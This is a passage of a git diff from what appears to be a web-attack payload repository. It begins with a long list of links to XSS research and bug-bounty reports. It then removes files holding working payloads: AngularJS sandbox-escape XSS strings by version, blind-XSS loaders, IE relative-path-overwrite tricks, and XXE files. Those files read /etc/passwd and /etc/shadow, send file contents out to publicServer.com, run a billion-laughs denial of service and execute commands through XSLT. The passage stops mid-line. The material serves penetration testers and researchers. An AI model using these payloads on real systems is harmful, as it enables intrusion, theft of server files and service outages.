[Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) -- tbm -- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html) -- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/) -- [RPO Gadget - innerthmtl](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) -- [Relative Path Overwrite - Detectify](https://support.detectify.com/support/solutions/articles/48001048955-relative-path-overwrite) -- [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass) -- [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html) -- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html) -- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://www.buaq.net/go-25883.html) -- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309) -- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) -- [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach -- [RPO that lead to information leakage in Google](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) by filedescriptor -- [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton -- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager -- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen -- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton -- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton -- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes -- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek -- [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S -- [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO -- [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) -- [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy -- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa -- [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen -- [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz -- [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify -- [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) -- [Microsoft XSS and Twitter XSS](https://wesecureapp.com/blog/xss-by-tossing-cookies/) -- [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans -- [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) -- [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) -- [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) -- [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) -- [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy -- [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard -- [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard -- [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) -- [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy -- [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) -- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow -- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett -- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) -- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) -- [postMessage XSS Bypass](https://hackerone.com/reports/231053) -- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin -- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans -- [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) -- [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen -- [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) -- [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov -- [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) -- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) -- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) -- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) -- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) -- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) -- [Bypass < with <](https://hackerone.com/reports/639684) -- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md deleted file mode 100644 index effb406..0000000 --- a/XSS Injection/XSS in Angular.md +++ /dev/null @@ -1,332 +0,0 @@ -# XSS in Angular and AngularJS - -## Client Side Template Injection - -The following payloads are based on Client Side Template Injection. - -### Stored/Reflected XSS - Simple alert in AngularJS - -> AngularJS as of version 1.6 have removed the sandbox altogether - -AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) - -```javascript -{{constructor.constructor('alert(1)')()}} -``` - -AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) - -```javascript -{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}} -``` - -Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) - -AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) - -```javascript -{{0[a='constructor'][a]('alert(1)')()}} -{{$eval.constructor('alert(1)')()}} -{{$on.constructor('alert(1)')()}} -``` - -AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) - -```javascript -{{ - c=''.sub.call;b=''.sub.bind;a=''.sub.apply; - c.$apply=$apply;c.$eval=b;op=$root.$$phase; - $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; - C=c.$apply(c);$root.$$phase=op;$root.$digest=od; - B=C(b,c,b);$evalAsync(" - astNode=pop();astNode.type='UnaryExpression'; - astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; - astNode.argument={type:'Identifier',name:'foo'}; - "); - m1=B($$asyncQueue.pop().expression,null,$root); - m2=B(C,null,m1);[].push.apply=m2;a=''.sub; - $eval('a(b.c)');[].push.apply=a; -}} -``` - -AngularJS 1.5.0 - 1.5.8 - -```javascript -{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} -``` - -AngularJS 1.4.0 - 1.4.9 - -```javascript -{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} -``` - -AngularJS 1.3.20 - -```javascript -{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} -``` - -AngularJS 1.3.19 - -```javascript -{{ - 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; - $eval('x=alert(1)//'); -}} -``` - -AngularJS 1.3.3 - 1.3.18 - -```javascript -{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; - 'a'.constructor.prototype.charAt=[].join; - $eval('x=alert(1)//'); }} -``` - -AngularJS 1.3.1 - 1.3.2 - -```javascript -{{ - {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; - 'a'.constructor.prototype.charAt=''.valueOf; - $eval('x=alert(1)//'); -}} -``` - -AngularJS 1.3.0 - -```javascript -{{!ready && (ready = true) && ( - !call - ? $$watchers[0].get(toString.constructor.prototype) - : (a = apply) && - (apply = constructor) && - (valueOf = call) && - (''+''.toString( - 'F = Function.prototype;' + - 'F.apply = F.a;' + - 'delete F.a;' + - 'delete F.valueOf;' + - 'alert(1);' - )) - );}} -``` - -AngularJS 1.2.24 - 1.2.29 - -```javascript -{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} -``` - -AngularJS 1.2.19 - 1.2.23 - -```javascript -{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} -``` - -AngularJS 1.2.6 - 1.2.18 - -```javascript -{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} -``` - -AngularJS 1.2.2 - 1.2.5 - -```javascript -{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} -``` - -AngularJS 1.2.0 - 1.2.1 - -```javascript -{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} -``` - -AngularJS 1.0.1 - 1.1.5 and Vue JS - -```javascript -{{constructor.constructor('alert(1)')()}} -``` - -### Advanced bypassing XSS - -AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_) - -```javascript -{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} -``` - -AngularJS (without `'` single and `"` double quotes and `constructor` string) - -```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} -``` - -```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} -``` - -```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} -``` - -```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} -``` - -AngularJS bypass Waf [Imperva] - -```javascript -{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}} -``` - -### Blind XSS - -1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) - -```javascript -{{ - constructor.constructor("var _ = document.createElement('script'); - _.src='//localhost/m'; - document.getElementsByTagName('body')[0].appendChild(_)")() -}} -``` - - -Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger) - -```javascript -{{ - $on.constructor("var _ = document.createElement('script'); - _.src='//localhost/m'; - document.getElementsByTagName('body')[0].appendChild(_)")() -}} -``` - -1.2.0 - 1.2.5 by Gareth Heyes (PortSwigger) - -```javascript -{{ - a="a"["constructor"].prototype;a.charAt=a.trim; - $eval('a",eval(`var _=document\\x2ecreateElement(\'script\'); - _\\x2esrc=\'//localhost/m\'; - document\\x2ebody\\x2eappendChild(_);`),"') -}} -``` - -1.2.6 - 1.2.18 by Jan Horn (Cure53, now works at Google Project Zero) - -```javascript -{{ - (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'eval(" - var _ = document.createElement(\'script\'); - _.src=\'//localhost/m\'; - document.getElementsByTagName(\'body\')[0].appendChild(_)")')() -}} -``` - -1.2.19 (FireFox) by Mathias Karlsson - -```javascript -{{ - toString.constructor.prototype.toString=toString.constructor.prototype.call; - ["a",'eval("var _ = document.createElement(\'script\'); - _.src=\'//localhost/m\'; - document.getElementsByTagName(\'body\')[0].appendChild(_)")'].sort(toString.constructor); -}} -``` - -1.2.20 - 1.2.29 by Gareth Heyes (PortSwigger) - -```javascript -{{ - a="a"["constructor"].prototype;a.charAt=a.trim; - $eval('a",eval(` - var _=document\\x2ecreateElement(\'script\'); - _\\x2esrc=\'//localhost/m\'; - document\\x2ebody\\x2eappendChild(_);`),"') -}} -``` - -1.3.0 - 1.3.9 by Gareth Heyes (PortSwigger) - -```javascript -{{ - a=toString().constructor.prototype;a.charAt=a.trim; - $eval('a,eval(` - var _=document\\x2ecreateElement(\'script\'); - _\\x2esrc=\'//localhost/m\'; - document\\x2ebody\\x2eappendChild(_);`),a') -}} -``` - -1.4.0 - 1.5.8 by Gareth Heyes (PortSwigger) - -```javascript -{{ - a=toString().constructor.prototype;a.charAt=a.trim; - $eval('a,eval(`var _=document.createElement(\'script\'); - _.src=\'//localhost/m\';document.body.appendChild(_);`),a') -}} -``` - -1.5.9 - 1.5.11 by Jan Horn (Cure53, now works at Google Project Zero) - -```javascript -{{ - c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply; - c.$eval=b;op=$root.$$phase; - $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; - C=c.$apply(c);$root.$$phase=op;$root.$digest=od; - B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};"); - m1=B($$asyncQueue.pop().expression,null,$root); - m2=B(C,null,m1);[].push.apply=m2;a=''.sub; - $eval('a(b.c)');[].push.apply=a; -}} -``` - -## Automatic Sanitization - -> To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values. - -However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods: - -- bypassSecurityTrustHtml -- bypassSecurityTrustScript -- bypassSecurityTrustStyle -- bypassSecurityTrustUrl -- bypassSecurityTrustResourceUrl - -Example of a component using the unsecure method `bypassSecurityTrustUrl`: - -``` -import { Component, OnInit } from '@angular/core'; - -@Component({ - selector: 'my-app', - template: ` - <h4>An untrusted URL:</h4> - <p><a class="e2e-dangerous-url" [href]="dangerousUrl">Click me</a></p> - <h4>A trusted URL:</h4> - <p><a class="e2e-trusted-url" [href]="trustedUrl">Click me</a></p> - `, -}) -export class App { - constructor(private sanitizer: DomSanitizer) { - this.dangerousUrl = 'javascript:alert("Hi there")'; - this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl); - } -} -``` - -![XSS](https://angular.io/generated/images/guide/security/bypass-security-component.png) - -When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application. - -## References - -- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) -- [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) -- [Angular Security](https://angular.io/guide/security) -- [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b) diff --git a/XSS Injection/XSS with Relative Path Overwrite.md b/XSS Injection/XSS with Relative Path Overwrite.md deleted file mode 100644 index ae2e911..0000000 --- a/XSS Injection/XSS with Relative Path Overwrite.md +++ /dev/null @@ -1,49 +0,0 @@ -# XSS with Relative Path Overwrite - IE 8/9 and lower - -You need these 3 components - -```javascript -1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))} -2) URL Rewriting. -3) Relative addressing to CSS style sheet : ../style.css -``` - -A little example - -```html -http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE] -<html> -<head> -<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> -<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" /> -</head> -<body> -Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} -</body> -</html> -``` - -Explanation of the vulnerability - -> The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. -> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works. - -Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php` -Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3` -MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php` - -From : `http://www.thespanner.co.uk/2014/03/21/rpo/` - -## Mutated XSS for Browser IE8/IE9 - -```javascript -<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing> -<script>alert(document.getElementById('x').innerHTML)</script> -``` - -IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. - - -## References - -- [TODO](TODO) \ No newline at end of file diff --git a/XXE Injection/Files/Classic XXE - etc passwd.xml b/XXE Injection/Files/Classic XXE - etc passwd.xml deleted file mode 100644 index 0e307b9..0000000 --- a/XXE Injection/Files/Classic XXE - etc passwd.xml +++ /dev/null @@ -1,6 +0,0 @@ -<?xml version="1.0"?> -<!DOCTYPE data [ -<!ELEMENT data (#ANY)> -<!ENTITY file SYSTEM "file:///etc/passwd"> -]> -<data>&file;</data> diff --git a/XXE Injection/Files/Classic XXE B64 Encoded.xml b/XXE Injection/Files/Classic XXE B64 Encoded.xml deleted file mode 100644 index 4acbac1..0000000 --- a/XXE Injection/Files/Classic XXE B64 Encoded.xml +++ /dev/null @@ -1 +0,0 @@ -<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/> diff --git a/XXE Injection/Files/Classic XXE.xml b/XXE Injection/Files/Classic XXE.xml deleted file mode 100644 index 02f0b27..0000000 --- a/XXE Injection/Files/Classic XXE.xml +++ /dev/null @@ -1,6 +0,0 @@ -<?xml version="1.0"?> -<!DOCTYPE data [ -<!ELEMENT data (#ANY)> -<!ENTITY file SYSTEM "file:///sys/power/image_size"> -]> -<data>&file;</data> \ No newline at end of file diff --git a/XXE Injection/Files/Deny Of Service - Billion Laugh Attack b/XXE Injection/Files/Deny Of Service - Billion Laugh Attack deleted file mode 100644 index e4f2199..0000000 --- a/XXE Injection/Files/Deny Of Service - Billion Laugh Attack +++ /dev/null @@ -1,8 +0,0 @@ -<!DOCTYPE data [ -<!ENTITY a0 "dos" > -<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> -<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> -<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> -<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> -]> -<data>&a4;</data> \ No newline at end of file diff --git a/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml b/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml deleted file mode 100644 index d36bca6..0000000 --- a/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml +++ /dev/null @@ -1,9 +0,0 @@ -XXE OOB Attack (Yunusov, 2013) -<?xml version="1.0" encoding="utf-8"?> -<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"> -<data>&send;</data> - -File stored on http://publicServer.com/parameterEntity_oob.dtd -<!ENTITY % file SYSTEM "file:///sys/power/image_size"> -<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> -%all; \ No newline at end of file diff --git a/XXE Injection/Files/XXE PHP Wrapper.xml b/XXE Injection/Files/XXE PHP Wrapper.xml deleted file mode 100644 index b345aee..0000000 --- a/XXE Injection/Files/XXE PHP Wrapper.xml +++ /dev/null @@ -1,10 +0,0 @@ -<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> -<contacts> - <contact> - <name>Jean &xxe; Dupont</name> - <phone>00 11 22 33 44</phone> - <address>42 rue du CTF</address> - <zipcode>75000</zipcode> - <city>Paris</city> - </contact> -</contacts> diff --git a/XXE Injection/Intruders/XXE_Fuzzing.txt b/XXE Injection/Intruders/XXE_Fuzzing.txt deleted file mode 100644 index 8c3340c..0000000 --- a/XXE Injection/Intruders/XXE_Fuzzing.txt +++ /dev/null @@ -1,48 +0,0 @@ -<?xml version="1.0" encoding="ISO-8859-1"?> -<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> -<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> -<?xml version="1.0" encoding="ISO-8859-1"?><test></test> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> -<test></test> -<![CDATA[<test></test>]]> -&foo; -%foo; -count(/child::node()) -x' or name()='username' or 'x'='y -<name>','')); phpinfo(); exit;/*</name> -<![CDATA[<script>var n=0;while(true){n++;}</script>]]> -<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> -<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> -<foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> -<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> -<foo><![CDATA[' or 1=1 or ''=']]></foo> -<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> -<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<xml SRC="xsstest.xml" ID=I></xml> -<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> -<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> -<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> -<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> -<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> -<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> -<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> -<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int; -<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % 